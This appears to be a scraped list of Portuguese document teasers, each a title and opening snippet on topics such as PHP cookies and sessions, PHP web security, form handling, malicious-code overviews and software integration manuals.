Leia maisPHP: Cookies e Sessões
PHP: Cookies e Sessões Programação de Servidores Marx Gomes Van der Linden Protocolo HTTP O protocolo HTTP não tem conceito de sessões. Modelo simples de Requisição e Resposta. http://marx.vanderlinden.com.br/
Leia maisPHP & Segurança: Uma União Possível
PHP & Segurança: Uma União Possível v. 2.1 Abril/2007 Objetivo: Esta apresentação tem por objetivo apresentar técnicas para o desenvolvimento de aplicações seguras utilizando a linguagem PHP, eliminando
Leia maisEnviado dados para o PHP através de formulário
Enviado dados para o PHP através de formulário Bom galera, eu estive um tempo parado sem postar nada aqui no blog, mas prometo que vou tentar voltar a ativa. Mas vamos deixar de conversa e vamos ao que
Leia maisTrabalho de Sistema de Informações. Instalação e configuração aplicativo Ocomon
Trabalho de Sistema de Informações Aluno: Paulo Roberto Carvalho da Silva Instalação e configuração aplicativo Ocomon O trabalho tem como objetivo o estudo de caso,a instalação, configuração e funcionamento
Leia maisManual de Integração Via Gadget. Passo a passo para realizar a integração entre websites e a plataforma Virtual Target.
Manual de Integração Via Gadget Passo a passo para realizar a integração entre websites e a plataforma Virtual Target. Manual de Integração Via Gadget 1. Introdução 1.1. O que é? Virtual Target Gadgets
Leia maisProf. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1
Segurança na Web Capítulo 9: Segurança em Aplicações Web Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW Page 1 Vulnerabilidade em Formulários PHP Construção de um formulário simples em PHP: Page 2
Leia maisGuia de administração para a integração do Portrait Dialogue 6.0. Versão 7.0A
Guia de administração para a integração do Portrait Dialogue 6.0 Versão 7.0A 2013 Pitney Bowes Software Inc. Todos os direitos reservados. Esse documento pode conter informações confidenciais ou protegidas
Leia maisScript de Configuração dos E-mails @SEE (Webmail /Outlook Express)
Script de Configuração dos E-mails @SEE (Webmail /Outlook Express) A Secretaria de Estado da Educação está disponibilizando uma nova ferramenta para acesso ao e-mail @see. Essa nova ferramenta permitirá
Leia maisCódigos Maliciosos. Prof. MSc. Edilberto Silva edilms@yahoo.com http://www.edilms.eti.br
Códigos Maliciosos Prof. MSc. Edilberto Silva edilms@yahoo.com http://www.edilms.eti.br Agenda Códigos maliciosos Tipos principais Cuidados a serem tomados Créditos Códigos maliciosos (1/3) Programas especificamente
Leia maisGuia de Integração para Transferência
Guia de Integração para Transferência Índice Capítulo 1... 3 Introdução... 3 Capítulo 2... 4 Links de Pagamento... 4 Capítulo 3... 5 Configurando o Gerenciador de Compras... 5 Capítulo 4... 7 Fluxo de
Leia maisFERRAMENTAS DE COLABORAÇÃO CORPORATIVA
FERRAMENTAS DE COLABORAÇÃO CORPORATIVA Manual de Utilização Google Grupos Sumário (Clique sobre a opção desejada para ir direto à página correspondente) Utilização do Google Grupos Introdução... 3 Página
Leia maisTolerância a Falhas em sistemas distribuídos (programação)
Tolerância a Falhas em sistemas distribuídos (programação) Arthur Zavattieri Cano Lopes Curso de Redes e Segurança de Sistemas Pontifícia Universidade Católica do Paraná Curitiba, Maio de 2009. Resumo
Leia maisSumário. Capítulo 1 Revisão de PHP... 19. Capítulo 2 Melhorando o processamento de formulários... 46
9 Sumário O Autor... 8 Introdução... 15 Quem deve ler este livro... 15 Como este livro está organizado...16 Download do código-fonte do livro... 18 Capítulo 1 Revisão de PHP... 19 Iniciando em PHP... 19
Leia maisScriptlets e Formulários
2 Scriptlets e Formulários Prof. Autor: Daniel Morais dos Reis e-tec Brasil Programação Avançada Para Web Página1 Meta Permitir ao aluno aprender a criar um novo projeto Java para web no Netbeans IDE,
Leia mais